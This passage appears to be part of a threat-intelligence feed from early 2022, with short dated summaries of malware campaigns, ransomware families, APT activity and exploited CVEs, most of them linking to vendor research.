- BotenaGo malware source code is now available to any malicious hacker or malware developer. With only 2 891 lines of code BotenaGo has the potential to be the starting point for many new variants and new malware families using its source code. Alien Labs expects to see new campaigns based on BotenaGo variants targeting routers and IoT devices globally.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- StellarParticle campaign by CozyBear/APT29
- Date of Scan:
- 2022-02-02
- Impact:
- HIGH
- Summary:
- Researchers at Crowdstrike has tracked activities of the StellatPraticle campaign and its association with the COZY BEAR adversary group. They have also disccussed about the Tactics and Techniques leveraged in StellarPraticle few of the techniques are – Credential hopping use of TrailBlazer implant and Linux variant of GoldMax malware etc.
Source:
https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
—
- Intel Source:
- Curated Intel
- Intel Name:
- Belarusian Cyber-Partisans group attack national railways
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- Belarusian hacktivist group aka Belarusian Cyber-Partisans claimed responsibility for a limited attack against the national railway company. A primary objective of the attack they claimed was aimed at hindering Russian troop movements inside Belarus. Initial access via BlueKeep RCE (CVE-2019-0708) in RDP in a Windows Server 2008 R2 system. Used the 3proxy[.]ru service to launch attacks from a VPS. Use of Mimikatz to dump LSASS etc..
Source:
https://www.curatedintel.org/2022/01/hacktivist-group-shares-details-related.html
—
- Intel Source:
- Federal Office_German Government
- Intel Name:
- APT 27 targetting German Companies
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- German government informed about a Chinese cyberespionage campaign who have been targetting german companies by exploiting vulnerabilities in Microsoft exchange and ZOHO Self service. In this campaign HyperBro malware was used.
—
- Intel Source:
- Cyfirma
- Intel Name:
- WaspLocker Ransomware
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- WaspLocker is a ransomware which encrypts files on your system with AES+RSA encryption and append the encrypted files with .0.locked extension and put them in a folder with extension .locked. It spreads via phishing spear phishing and social engineering tactics.
Source:
https://www.cyfirma.com/outofband/ransomware-report-wasplocker/
—
- Intel Source:
- Avast
- Intel Name:
- Chaes Banking Trojan
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- Researchers from Avast discovered that Chaes banking Trojan has been actively spreading since November 2020. Chaes is its multi-stage distribution method which makes use of programming frameworks such as JScript Python and NodeJS binary files written in Delphi as well as malicious Google Chrome extensions among other things.
Source:
https://decoded.avast.io/anhho/chasing-chaes-kill-chain/
—
- Intel Source:
- Internal
- Intel Name:
- Log4j 4 IP’s
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- IP address linked to Log4j vulnerability
Source:
Internal Investigations
—
- Intel Source:
- Blackberry
- Intel Name:
- Prophet Spider exploiting Log4j Vulnerability
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- Blackberry Research team have discovered an correlating attack by Prophet Spider group with exploitation of Log4j vulnerability in VMware Horizon. Researchers also claimed to have spotted Propjer Spider TTPs as sell network access to other criminals including ransomware gangs. Despite VMware’s patch and subsequent guidance many implementations remain unpatched leaving them susceptible to exploitation.
Source:
https://blogs.blackberry.com/en/2022/01/log4u-shell4me
—
- Intel Source:
- MalwareBytes
- Intel Name:
- KONNI RAT
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- KONNI is a Remote Administration Tool that has being used for at least 8 years. The North Korean threat actor that is using this piece of malware has being identified under the Kimsuky umbrella. KONNI Rat is being actively developed and new samples are now including significant updates.
Source:
https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/
—
- Intel Source:
- Team Cymru
- Intel Name:
- Analysis of a Management IP Address linked to Molerats APT
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- Team Cymru have analysed management of IP addresses which were linked to Molerats APT. These were higher order infrastructure utilizing IP addresses assigned to Palestinian providers. Additionally the targets identified were Israel and Saudi Arabia.
Source:
https://team-cymru.com/blog/2022/01/26/analysis-of-a-management-ip-address-linked-to-molerats-apt/
—
- Intel Source:
- Sophos
- Intel Name:
- Midas Ransomware
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- An attack on technology vendor was identified and the ransomware behind it was Midas. Midas Ransomware Attack Highlights the Risks of Limited Access Controls and “Ghost” Tools. The attackers were able to spend nearly two months undetected in a target’s environment.
—
- Intel Source:
- Morphisec
- Intel Name:
- AsyncRAT
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- Morphisec researchers have identified a new sophisticated campaign delivery evading multiple AVs. Through a simple email phishing tactic with an html attachment threat attackers are delivering AsyncRAT (a remote access trojan) designed to remotely monitor and control its infected computers through a secure encrypted connection.
Source:
https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- DazzleSpy macOS malware
- Date of Scan:
- 2022-01-27
- Impact:
- MEDIUM
- Summary:
- ESET rersearchers discovered a new watering hole attack targeting macOS users and visitors of a pro-democracy radio station website in Hong Kong and infecting them with the DazzleSpy malware.
Source:
https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/
—
- Intel Source:
- Cofense
- Intel Name:
- TrickBot Invoices
- Date of Scan:
- 2022-01-27
- Impact:
- HIGH
- Summary:
- In the new campaign TrickBot is taking advantage of supply chain delays and sending the phishing emails to users with an invoice attachment claiming to be from USPS. This TrickBot campaign demonstrates more effort than past campaigns relative to design and more in the email itself. Most of the time the style for TrickBot campaign emails is relatively simple and can be easily spotted as suspicious.
Source:
https://cofense.com/blog/trickbot-malware-delivered-as-invoicess
—
- Intel Source:
- STR
- Intel Name:
- PKEXEC LPE/CVE-2021-4034_Seeder Queries
- Date of Scan:
- 2022-01-26
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- STR
- Intel Name:
- WhisperGate TTP_Seeder Queries
- Date of Scan:
- 2022-01-26
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Fortinet
- Intel Name:
- STRRAT Malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet has identified an email which was subsequently found to harbor a variant of the STRRAT malware as an attachment. STRRAT is a multi-capability Remote Access Trojan that dates to at least mid-2020. Unusually it is Java-based and is typically delivered via phishing email to victims.
Source:
https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign
—
- Intel Source:
- Trend Micro
- Intel Name:
- APT36/Earth Karkaddan
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- According to Trend Micro researchers the suspected Pakistani threat actor group APT36 aka Earth Karkaddan has expanded its malware arsenal by adding a new Android Rat malware -CapraRAT.
—
- Intel Source:
- Cleafy Labs
- Intel Name:
- BRATA RAT malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Cleafy have tracked BRATA malware and have documented its evolution in terms of both new targets and new features.
Source:
https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account
—
- Intel Source:
- IBM
- Intel Name:
- Trickbot’s new evasion technique
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- As per securityintelligence researchers TrickBot operators have been escalating activity. As part of that escalation malware injections have been fitted with added protection to keep researchers out and get through security controls.
Source:
https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/
—
- Intel Source:
- Netskope
- Intel Name:
- Infected PowerPoint Files Using Cloud Services to Deliver Multiple Malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Netspoke has identified an increase in the usage of one specific file type from the Microsoft Office suite: PowerPoint. These relatively small files are being delivered through phishing emails then downloading and executing malicious scripts through LoLBins a common technique often used to stay under the radar.
—
- Intel Source:
- QI-ANXIN Threat Intelligence Center
- Intel Name:
- OceanLotus APT attack
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- The state-sponsored threat actor group known as OceanLotus is using the web archive file format to evade system detection while delivering backdoors for intrusion. A report from QI-ANXIN Threat Intelligence Center claims that OceanLotus’s campaign is actively using web archive files (.MHT and .MHTML) for its attacks.
—
- Intel Source:
- Proofpoint
- Intel Name:
- DTPacker
- Date of Scan:
- 2022-01-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Proofoint has identified a malware packer which researchers have dubbed as ‘DTPacker’. The malware is typically used to pack remote access trojans that can be used to steal information and load follow-on payloads such as ransomware.
Source:
https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1
—
- Intel Source:
- STR
- Intel Name:
- MoonBounce Implant_Seeder Queries
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- STR
- Intel Name:
- AIKIDO C2_Seeder Queries – 24/01/2022
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Gemini Advisory
- Intel Name:
- FIN7 trojanized USB
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- Geminiadvisory researchers found FIN7 group using flash drives to Spread Remote Access Trojan. It uses the trojanized USB devices to ultimately load the IceBot Remote Access Trojan (RAT) resulting in FIN7 gaining unauthorized remote access to systems within victims’ networks.
Source:
https://geminiadvisory.io/fin7-flash-drives-spread-remote-access-trojan/
—
- Intel Source:
- Zscaler
- Intel Name:
- Molerats APT Espionage campaign
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- Zscaler ThreatLabz team have detected several samples of macro-based MS office files uploaded from Middle Eastern countries. These files contained decoy themes related to geo-political conflicts between Israel and Palestine. Such themes have been used in previous attack campaigns waged by the Molerats APT.
—
- Intel Source:
- ASEC
- Intel Name:
- DDoS IRC Bot Malware
- Date of Scan:
- 2022-01-24
- Impact:
- LOW
- Summary:
- ASEC Research Team has discovered that DDoS IRC Bot strains disguised as adult games are being installed via webhards. Webhards are platforms commonly used for the distribution of malware in Korea where njRAT and UDP Rat were distributed in the past.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Emotet Spam
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- Trend Micro research team spotted the new ransomware family named ‘White Rabbit’ which discretely making a name for itself by executing an attack on a local US bank in December 2021. The ransomware copies the hiding capability from Egregor and carries a potential connection to the APT group FIN8.
—
- Intel Source:
- Akamai
- Intel Name:
- Mirai Botnet Abusing Log4j
- Date of Scan:
- 2022-01-21
- Impact:
- HIGH
- Summary:
- Researchers at Akamai has examined a ARM binary which revealed the adaptation of Log4j vulnerability to infect and assist in the proliferation of malware used by the Mirai botnet.
Source:
https://www.akamai.com/blog/security/mirai-botnet-abusing-log4j-vulnerability
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- DONOT Hacking team/APT-C-35/SectorE02
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- ESET researchers take a deep look into recent attacks carried out by Donot Team throughout 2020 and 2021 targeting government and military entities in several South Asian countries.
Source:
https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/
—
- Intel Source:
- BitDefender
- Intel Name:
- BHUNT Stealer
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- Bitdefender researchers have discovered a new family of crypto-wallet stealer malware dubbed as ‘BHUNT’. The samples identified appear to have been digitally signed with a digital certificate issued to a software company but the digital certificate does not match the binaries.
—
- Intel Source:
- INKY
- Intel Name:
- DoL Phishing
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- Researchers at INKY has detected phishing campaign that impersonated the United States Department of Labor (DoL). In this campaign the majority of phishing attempts had sender email addresses spoofed to look as if they came from no-reply@dol[.]gov which is the real DoL site. A small subset was spoofed to look as if they came from no-reply@dol[.]com which is of course not the real DoL domain.
—
- Intel Source:
- Microsoft
- Intel Name:
- WhisperGate
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- MSTIC found a destructive malware operation which have been targeting organaizations in UKraine. The malware has been dubbed as WhisperGate. The activity has been identified as possible Master Boot Records (MBR) Wiper activity.
—
- Intel Source:
- Kaspersky
- Intel Name:
- Targeted ICS Spyware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- Kaspersky ICS Experts have noticed a large set of campaigns that spread from one industrial enterprise to another via hard-to-detect phishing emails disguised as the victim organizations’ correspondence and abusing their corporate email systems to attack through the contact lists of compromised mailboxes.
—
- Intel Source:
- Elastic
- Intel Name:
- Operation Bleeding Bear
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- Researchers at Elastic Security provides new analysis and insights into targeted campaign against Ukraine organizations with destructive malware. In a multi-staged attack one malware component known as WhisperGate utilizes a wiping capability on the Master Boot Record (MBR) making any machine impacted inoperable after boot-up.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Blackcat Ransomware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelOne analysing BlackCat Ransomware behaviour. BlackCat first appeared in late November 2021 and has reportedly been attacking targets in multiple countries including Australia India and the U.S and demanding ransoms in the region of $400 000 to $3 000 000 in Bitcoin or Monero.
—
- Intel Source:
- Trend Micro
- Intel Name:
- White Rabbit Ransomware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- Trend Micro research team spotted the new ransomware family named ‘White Rabbit’ which discretely making a name for itself by executing an attack on a local US bank in December 2021. The ransomware copies the hiding capability from Egregor and carries a potential connection to the APT group FIN8.
—
- Intel Source:
- Kaspersky
- Intel Name:
- MoonBounce
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- Kaspersky Researchers has identified a UEFI firmware-level compromise which Researchers further analysed and detected that a single component within the inspected firmware’s image was modified by attackers in a way that allowed them to intercept the original execution flow of the machine’s boot sequence and introduce a sophisticated infection chain.
Source:
https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/
—
- Intel Source:
- STR
- Intel Name:
- AIKIDO C2_Seeder Queries – 18/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- STR
- Intel Name:
- SysJoker_Seeder Queries – 12/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Bushidotoken
- Intel Name:
- (Mailbox Phishing Kit)Espionage campaign- Renewable energy companies
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- A security researcher discovered a large-scale cyber-espionage campaign targeting primarily renewable energy and industrial technology organization. The attacker uses a custom ‘Mail Box’ toolkit an unsophisticated phishing package deployed on the actors’ infrastructure as well as legitimate websites compromised to host phishing pages.
—
- Intel Source:
- Uptycs
- Intel Name:
- vSphere cryptominer campaign
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- Researchers from Uptycs identified some malicious shell scripts which specifically targets VMware vSphere. The attackers have used certain commands in the shell script to modify the vSphere service in order to run the Xmrig miner.
Source:
https://www.uptycs.com/blog/cryptominer-campaign-targeting-vmware-vsphere-services-for-coin-mining
—
- Intel Source:
- STR
- Intel Name:
- AIKIDO ICEID New Delivery Method_Seeder Queries – 12/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- STR
- Intel Name:
- MuddyWater_MOIS_Seeder Queries – 14/01/2022
- Date of Scan:
- 2022-01-18
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Kaspersky
- Intel Name:
- BlueNoroff APT Group
- Date of Scan:
- 2022-01-14
- Impact:
- HIGH
- Summary:
- The North Korea-linked APT group BlueNoroff has been spotted targeting cryptocurrency startups with fake MetaMask browser extensions. The latest attacks targeted cryptocurrency startups in the US Russia China India the UK Ukraine Poland Czech Republic UAE Singapore Estonia Vietnam Malta Germany and Hong Kong.
Source:
https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/
—
- Intel Source:
- eSentire
- Intel Name:
- GootLoader Campaign
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Esentire researchers found that Operators of the GootLoader campaign are targeting employees of accounting and law firms. GootLoader is a stealthy initial access malware which after getting a foothold into the victim’s computer system infects the system with ransomware or other lethal malware.
—
- Intel Source:
- Microsoft
- Intel Name:
- DEV-0401
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Microsoft Threat Intelligence Center has detected an activity from attackers where they started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. These attacks are performed by a China-based ransomware operator that they tracking as DEV-0401.
—
- Intel Source:
- Netskope
- Intel Name:
- Abusing MS Office Using Malicious Web Archive Files
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- The OceanLotus group of state-sponsored hackers are now using the web archive file format (.MHT and .MHTML) to deploy backdoors to compromised systems.
Source:
https://www.netskope.com/blog/abusing-microsoft-office-using-malicious-web-archive-files
—
- Intel Source:
- Avast
- Intel Name:
- Exploit Kits vs Chrome
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Avast researchers found Underminer exploit kit developed an exploit for the Chromium based vulnerability.There were two exploit kits that dared to attack Google Chrome: Magnitude using CVE-2021-21224 and CVE-2021-31956 and Underminer using CVE-2021-21224 CVE-2019-0808 CVE-2020-1020 and CVE-2020-1054.
Source:
https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/
—
- Intel Source:
- US cyber command
- Intel Name:
- MuddyWater_MOIS
- Date of Scan:
- 2022-01-13
- Impact:
- HIGH
- Summary:
- U.S. Cyber Command’s Cyber National Mission Force (CNMF) has identified multiple open-source tools used by an Iranian advanced persistent threat (APT) group known as MuddyWater. The techniques used by the APT group includes side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- TellYouThePass Ransomware
- Date of Scan:
- 2022-01-13
- Impact:
- HIGH
- Summary:
- Crowdstrike found re-emerged version of TellYouThePass ransomware compiled using golang. The same ransomware was recently associated with Log4Shell post-exploitation targeting Windows and Linux.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber Ransomware
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Analysts from ahnlab discovered that attackers behind the Magniber ransomware who have been exploiting IE-based vulnerabilities so far are now targeting PCs via modern browsers such as Edge and Chrome.
—
- Intel Source:
- Cado security
- Intel Name:
- ABCbot
- Date of Scan:
- 2022-01-12
- Impact:
- LOW
- Summary:
- Cadosecurity researchers analyzed Abcbot and found its link with Xanthe based cryptojcaking campaign. Same threat actor is responsible for both Xanthe and Abcbot and is shifting its objective from mining cryptocurrency on compromised hosts to activities more traditionally associated with botnets such as DDoS attacks.
Source:
https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Nanocore Netwire and AsyncRAT
- Date of Scan:
- 2022-01-12
- Impact:
- HIGH
- Summary:
- Cisco Talos researchers discovered new attacks Campaign Using Public Cloud Infrastructure to Spread RATs those RATs are Nanocore Netwire and AsyncRATs.
Source:
https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Patchwork APT
- Date of Scan:
- 2022-01-12
- Impact:
- LOW
- Summary:
- MalwareBytes labs has analysed a campaign where Patchwork APT has used malicious RTF files to drop a variant of the BADNEWS Remote Administration Trojan (RAT).
Source:
https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/
—
- Intel Source:
- Fortinet
- Intel Name:
- RedLine Stealer
- Date of Scan:
- 2022-01-12
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet has identified an executable file ‘Omicron Stats.exe’ which attributed to be a variant of RedLine Stealer malware. Researchers has analysed Redline new variant its core functions how it communicates with its C2 server and how organizations can protect themselves.
—
- Intel Source:
- STR
- Intel Name:
- STR Omega 1/12/22
- Date of Scan:
- 2022-01-12
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Checkpoint
- Intel Name:
- APT35
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- CheckPoint researchers discovered that APT35 have started widespread scanning and attempts to leverage Log4j flaw in publicly facing systems.
—
- Intel Source:
- Intezer
- Intel Name:
- SysJoker Backdoor
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- Researchers from Intezer discovered a new ulti-platform backdoor that targets Windows Mac and Linux. The backdoor was named as SysJoker. SysJoker masquerades as a system update and generates its C2 by decoding a string retrieved from a text file hosted on Google Drive.
Source:
https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/
—
- Intel Source:
- STR
- Intel Name:
- Trojanized dnspy app campaign
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- STR
- Intel Name:
- VMware Horizon Exploitation Using Log4J
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Palo Alto
- Intel Name:
- TA551 IcedID
- Date of Scan:
- 2022-01-06
- Impact:
- MEDIUM
- Summary:
- Palo Alto Unit42 Researchers has tracked TA551 activity where threat actor using Word documents with both German templates and Italian templates. Later deliverying IcedID malware.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Web Skimmer Campaign
- Date of Scan:
- 2022-01-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Unit42 has found a supply chain attack leveraging a cloud video platform to distribute skimmer (aka formjacking) campaigns. In skimmer attacks cybercriminals inject malicious JavaScript code to hack a website and take over the functionality of the site’s HTML form page to collect sensitive user information.
Source:
https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Zloader Banking Malware Campaign
- Date of Scan:
- 2022-01-05
- Impact:
- MEDIUM
- Summary:
- Checkpoint Research Team tracking Zloader campaign and identified an evidence of the new campaign was first seen around early November 2021. The techniques incorporated in the infection chain include the use of legitimate remote management software (RMM) to gain initial access to the target machine.